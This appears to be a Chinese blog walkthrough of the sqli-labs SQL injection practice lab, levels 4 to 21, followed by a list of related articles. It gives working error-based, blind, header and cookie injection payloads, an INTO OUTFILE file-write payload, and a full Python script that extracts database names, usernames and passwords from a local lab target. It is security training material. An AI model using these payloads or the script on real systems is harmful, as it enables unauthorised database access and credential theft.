sqlilabs

最新推荐文章于 2024-07-24 21:49:24 发布
最新推荐文章于 2024-07-24 21:49:24 发布
阅读量78 收藏
点赞数
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76648294/article/details/131391003
版权

less4

 先试引号之类的闭合符号,发现有"需要闭合

 尝试引号之后还是报错,从回显中发现是还有(需要闭合

 这样就能正常回显

 

 

 

 瞅一眼源代码

这题的主要特点就是这个 。 

less5

 输入正确id就you are in,有回显却不直接回显,可以使用报错注入,当然bool和时间盲注也行。但是报错肯定最方便.

报错注入常用函数:

这里我们就直接用updatexml()

 按这个格式一路注入

唯一要注意的一点是,报错注入仅回显32位,所以需要二次查询

可以利用right()函数

后面的查询,不用多说

 less6

 一样的报错注入,不过是闭合双引号罢了

less7

 很贴心,上来就提醒我们用outfile

 实际上,读写操作是有权限的。拥有较高权限才能使用读写函数。

我们先来看看符号的闭合情况

 没试出来,试不出来就fuzz

筛选出部分可能

再把这些可能拼接查询语句,发现只有 '))可以成功,应该就是这样闭合了。

根据几次尝试之后,发现,语句正确就回显废话,错误就说你语法错误。

有两个思路:

思路一:outfile读取文件

要想用好文件写入和读取,就必须知道文件路径

文件路径获取方法一般有四种:1.warning报错显示路径

2.通过phpinfo发现路径

3.通过数据库配置文件发现路径

 4.根据该平台以往漏洞报告探索路径

我们这里是私网,就作个弊,用之前的靶机高出路径

-1'))union select 1,2,@@datadir--+

 这里我们用@@datadir得出路径,其实@@basedir也行吧

payload:?id=-1')) union select 1,2,database() into outfile "D:\\phpstudy_pro\\WWW\\sqlilabs\\sqli-labs-master\\Less-7\\1.txt"--+

需要注意的一点是:需要用双斜杠连接各个文件夹,否则斜杠将被当作转义符号

后面正常注入就🆗

思路二:布尔盲注

写一个简简单单的脚本就欧克

less8

这题甚至比上一题更简单

它的闭合方式没那么花里胡哨,只有一个单引号

方法还是两个,一个是转移回显,另一个是布尔盲注

less9

两个方法

第一个还是转移回显

 第二个是时间盲注

闭合条件是连猜带试做出来的

可以id=1'and sleep(3)--+

跑个脚本就可以

less10

除了闭合条件是双引号,其他的类似

less11

 这个并没有什么创新,实际上就是改变了注入提交方式,现在变成了post类型

另外,正常回显是不出现结果的,所以我们可以使用报错注入

less12

同样是post注入,只不过闭合方式不同

跑字典就行了

less13

跑字典

发现两个点。其一是闭合方式(这个是用了很多次了)其二就是回显。

可以看到,

当语法出现错误的时候,它也会回显 。为后面寻找方法做铺垫

紧接着我们尝试联合注入,发现并不回显文字,只会有提示成功的图片。结合前面的观察。我们推测可以使用报错注入。

 

果然,一发入魂。

less14

和less13几乎一样,就是闭合方式不同

 less15

跑完字典发现闭合方式还是很简单的。重点是后面的盲注吧。这次是post盲注。感觉有点麻烦

import requests
# 获取数据库名长度
def database_len():
    for i in range(1,10):
        url='http://localhost/sqlilabs/sqli-labs-master/Less-15/'
        data = {
            "uname":f"' or length(database())>{i}#",
            "passwd":"1",
            "submit":"Submit"
        }
        headers = {
            "Content-Type":"application/x-www-form-urlencoded",
        }
        r = requests.post(url,data = data ,headers =headers)
        if "flag.jpg" not in r.text:
            print('database_length:', i)
            return i




#获取数据库名
def database_name(databaselen):
     name = ''
     for j in range(1, databaselen+1):
        for i in "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz":
            url = 'http://localhost/sqlilabs/sqli-labs-master/Less-15/'
            data = {
                "uname": f"' or substr(database(),%d,1)='%s'#" % (j, i),
                "passwd": "1",
                "submit": "Submit"
            }
            headers = {
                "Content-Type": "application/x-www-form-urlencoded",
            }
            r = requests.post(url, data=data, headers=headers)
            if 'flag.jpg' in r.text:
                name = name + i
                break

     print('database_name:', name)


# 获取数据库表
def tables_name():
    name = ''
    for j in range(1, 30):
        for i in 'abcdefghijklmnopqrstuvwxyz,':
            url = 'http://localhost/sqlilabs/sqli-labs-master/Less-15/'
            data = {
                "uname": "' or substr((select group_concat(table_name) from information_schema.tables " \
                  "where table_schema=database()),%d,1)='%s'#" % (j, i),
                "passwd": "1",
                "submit": "Submit"
            }
            headers = {
                "Content-Type": "application/x-www-form-urlencoded",
            }
            r = requests.post(url, data=data, headers=headers)
            if 'flag.jpg' in r.text:
                name = name + i
                break

    print('table_name:', name)



# 获取表中字段
def columns_name():
    name = ''
    for j in range(1, 30):
        for i in 'abcdefghijklmnopqrstuvwxyz,':
            url = 'http://localhost/sqlilabs/sqli-labs-master/Less-15/'
            data = {
                "uname": f"' or substr((select group_concat(column_name) from information_schema.columns where " \
                  "table_schema=database() and table_name='users'),%d,1)='%s'#" % (j, i),
                "passwd": "1",
                "submit": "Submit"
            }
            headers = {
                "Content-Type": "application/x-www-form-urlencoded",
            }
            r = requests.post(url, data=data, headers=headers)
            if 'flag.jpg' in r.text:
                name = name + i
                break

    print('column_name:', name)



# 获取username
def username_value():
    name = ''
    for j in range(1, 100):
        for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
            url = 'http://localhost/sqlilabs/sqli-labs-master/Less-15/'
            data = {
                "uname": f"' or substr((select group_concat(username) from users),%d,1)='%s'#" % (j, i),
                "passwd": "1",
                "submit": "Submit"
            }
            headers = {
                "Content-Type": "application/x-www-form-urlencoded",
            }
            r = requests.post(url, data=data, headers=headers)
            if 'flag.jpg' in r.text:
                name = name + i
                break

    print('username_value:', name)



# 获取password
def password_value():
    name = ''
    for j in range(1, 100):
        for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
            url = 'http://localhost/sqlilabs/sqli-labs-master/Less-15/'
            data = {
                "uname": f"' or substr((select group_concat(password) from users),%d,1)='%s'#" % (j, i),
                "passwd": "1",
                "submit": "Submit"
            }
            headers = {
                "Content-Type": "application/x-www-form-urlencoded",
            }
            r = requests.post(url, data=data, headers=headers)
            if 'flag.jpg' in r.text:
                name = name + i
                break

    print('password_value:', name)


if __name__ == '__main__':
    dblen = database_len()
    database_name(dblen)
    tables_name()
    columns_name()
    username_value()
    password_value()

less16

跑脚本,看闭合

后面同less15

less17

这次在页面上做了文章。变成了改密码的界面。经过尝试可以发现,对username有要求,即必须在数据库已经存在 。随便用一个之前的账号admin

开始在密码上注入

由于是修改密码,往往要么没有回显(就用布尔或者时间盲注)

有回显但没有我们想象中的回显位置(用报错注入)

先尝试简单的报错注入

1'and updatexml(0,concat(0x5e,database()),0)#

 成功。这里有一点要注意,之前我们遇到的注入,我们拼接时常用逻辑词or连接。但是这次不同。由于这更像是执行一件事(修改密码)。所以逻辑连接词前面的无论如何都是真,所以我们必须用and连接,才能保证后面的语句执行!

后面爆数据出现了问题  1'and updatexml(1,concat(0x7e,(select password from security.users limit 0,1)),0)#

 看看源码

 它使用update语句更新数据。而我们拼接查询语句时,查询的也是users表。这就导致数据库不给与数据。所以,在from后,尝试1'and updatexml(1,concat(0x7e,(select password from (select table_name from information_schema.tables where table_schema='security' limit 2,1) limit 0,1)),0)#

 仍然不行,它说要具体的表名。看了别人的wp

1'and updatexml(1,concat(0x7e,(select password from (select * from users)test limit 0,1)),0)#

 成了。不知道为什么,test帮助后面的查询语句制表了。

less18

尝试了在password上注入,但是失败了。观察网页,发现登陆成功后会回显用户地址信息。怀疑user agent可能存在注入点。

一开始尝试1'and (updatexml(0,concat(0x5e,database()),0))#但是报错。仔细看看源代码

如果我们直接用注释符号结尾·的·话,很明显后面的语句全没了。因此,我们只能采取闭合的方式。payload:'and (updatexml(0,concat(0x5e,database()),0))and' 

 less19同理

less20

先抓包,fuzz之后发现全部失败

大概率是我们选错了post参数 或者post参数不与数据库交互

先验证第一种猜测。我们对之前用过的useragent和referer注入。同样失败。

 尝试cookie注入。成功。

 观看源代码

很明显,对post参数做了check_input过滤 。导致我们post注入失败。

less21

同样也是cookie注入,但是hackbar传了半天,老是提示乱码。

只能看看源代码了

 原来是base64加密了

之后尝试几次闭合方式就成了。

4_6_6_15
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sqli-labs
weixin_53955759的博客
04-13 2952
Less-1: 1.查字段数 2.看回显位置 3.爆数据库 4.爆表 5.爆字段 6.获取信息 Less-2: 相同步骤 1.查字段数 2.看回显位置 3.爆数据库 4.报表名 5.爆字段 6.获取信息 Less-3: 看了源码发现要闭合括号 1.爆字段数 ...
sqlilabs_4
ZERO_zero_0的博客
07-06 179
sqlilabs_4
c语言infile和outfile用法,C语言文件读写基本操作DEMO
weixin_31534091的博客
05-22 4063
DEMO来源于《C语言实战105例》中的34例:文件读写基本操作把infile中的内容写到outfile中去#include #include int main(){FILE *infile;FILE *outfile;//FILE *otherfile;char input;//char buffer[10];int i=0;infile=fopen("d:\\infile.txt","r+")...
C++对二进制文件的读写操作
njuzg的专栏
12-27 5504
二进制文件不是以ASCII代码存放数据的,它将内存中数据存储形式不加转换地传送到磁盘文件,因此它又称为内存数据的映像文件。因为文件中的信息不是字符数据,而是字节中的二进制形式的信息,因此它又称为字节文件。 对二进制文件的操作也需要先打开文件,用完后要关闭文件。在打开时要用ios::binary指定为以二进制形式传送和存储。二进制文件除了可以作为输入文件或输出文件外,还可以是既能输入又能输出的
C++ 读取文本文件(文件输入/输出)
热门推荐
dahulihuli的博客
11-12 1万+
对于文件的输入C++使用类似于cout的东西 1.必须包含头文件iostream、fstream 2.需要声明一个或者多个ofstream变量,并为他命名 3.使用完文件后 要用close()将其关闭 4.可以结合ofstream对象和运算符
sqlilabs过关手册注入天书,过关sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
mysql注入-sqlilabs靶场注入
10-15
本教程基于SQLiLabs靶场,将深入探讨MySQL注入的各种技术和防御策略。 SQLiLabs是专门为学习和实践SQL注入技能设计的一个在线平台,它包含了多个级别,每个级别代表一个特定的注入场景,逐步提高难度。通过完成这些...
sqlilabs过关手册注入天书
08-17
sqlilabs过关手册注入天书
sqlilabs.rar
07-04
sql-lab新版靶场,可以自己搭在虚拟机上练习sql注入
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
MySql 主从同步会不会影响到SQL执行速度?
weixin_44892327的博客
07-24 813
作用:负责将主库的二进制日志(binary log)数据传输到从库。工作方式:当从库连接到主库时,主库会为每个连接的从库开启一个 Binlog Dump 线程。这个线程从主库的二进制日志中读取日志记录,并将其发送给从库。Binlog Dump 线程:将二进制日志传输给从库。Binlog Dump GTID 线程(在启用 GTID 模式时):处理 GTID 相关的复制任务。
SQL进阶:解锁高级特性,深化数据洞察
WayneYalejk的博客
07-24 403
掌握了SQL的基础知识后,进一步探索其高级特性将帮助您更高效地处理复杂数据,深化数据分析的广度和深度。本文将带您领略SQL的高级功能,包括窗口函数、存储过程、触发器以及高级查询技巧等,让您在数据处理的道路上更进一步。通过这两篇文章,读者可以从SQL的基础知识逐步深入到高级特性,全面掌握SQL在数据处理和分析中的强大能力。
sql server 连接报错error 40
只会helloworld的小白啊的博客
07-24 268
Microsoft.Data.SqlClient.SqlException (0x80131904): A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL S
SQL 注入漏洞详解 - Union 注入
Toasten
07-23 1058
SQL 注入即是指 Web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 Web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询从而进一步得到相应的数据信息。
在 Windows 上安装 PostgreSQL
the_beginner的博客
07-24 440
选择额外的安装项(这里我选了一个JDBC驱动包,方便DBeaver访问)安装界面会指定服务程序和库两个路径,可以自己手动选择。官网直接提供exe安装包,没有手动安装的压缩包。
[极客大挑战 2019]BabySQL1
最新发布
jamesP777的博客
07-24 572
服务器把from uninoselector (估计还有orderby等等)这些关键字过滤,过滤方式是如果字符串中存在,则直接替换为空,我们利用这个规则拼接新的SQL语句,完成SQL注入
数据库实验:SQL Server创建数据库及基本表
sherry__yuzu的博客
07-24 259
1、掌握使用SQL SERVER Management Studio工具连接数据库引擎;2、掌握使用CREATE TABLE 创建基本表的用法;3、掌握使用ALTER TABLE 修改基本表的用法;4、掌握使用DROP TABLE删除基本表的用法;
Dav_笔记10:Using SQL Plan Management之4
Dav_2099的博客
07-23 497
数据库清除超过53周未使用的计划,由该计划的SMB中存储的LAST_EXECUTED时间戳标识。您可以使用计划名称(plan_name)
会Excel就会sql
svygh123的专栏
07-20 1058
以上就是通过具体的例子来说明Excel中对应的操作,以便更好地对比SQL,通过这些步骤,你可以直观地在Excel中实现类似数据库操作的功能,SQL就像是数据库世界的Excel,但它更加强大,适用于大规模数据处理和复杂的数据关系管理。虽然开始时可能会觉得SQL语法有些抽象,但一旦掌握了基础,你会发现它非常高效且强大,特别是在处理大量数据和执行复杂查询时。就像在Excel中一样,实践中学习SQL会更加有效,尝试编写一些简单的查询,逐渐增加难度,你会很快上手的!
Centos安装sqlilabs
10-17
好的,以下是CentOS安装sqlilabs的步骤: 1. 安装LAMP环境(Apache、MySQL、PHP)。 可以使用以下命令安装: ``` yum install httpd mysql-server php php-mysql ``` 2. 下载sqlilabs源码并解压。 可以使用以下命令下载: ``` wget https://github.com/Audi-1/sqli-labs/archive/master.zip ``` 解压: ``` unzip master.zip ``` 3. 将解压后的文件夹移动到Apache的根目录下。 ``` mv sqli-labs-master /var/www/html/ ``` 4. 修改MySQL的配置文件,使其支持低版本的加密方式。 打开MySQL的配置文件`/etc/my.cnf`,在`[mysqld]`下添加以下内容: ``` [mysqld] old_passwords=1 ``` 5. 重启MySQL服务。 ``` service mysqld restart ``` 6. 导入sqlilabs的数据库。 进入sqlilabs的目录,执行以下命令: ``` cd /var/www/html/sqli-labs-master/sqlilabs/ mysql -u root -p < sqlilabs_mysql_injection.sql ``` 7. 修改sqlilabs的配置文件。 进入sqlilabs的目录,将`config.inc.php.dist`重命名为`config.inc.php`,并修改以下内容: ``` $dbuser='root'; // MySQL用户名 $dbpass=''; // MySQL密码 $basepath=''; // sqlilabs的根目录,留空即可 ``` 8. 访问sqlilabs。 在浏览器中输入`http://localhost/sqli-labs-master/`即可访问sqlilabs。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值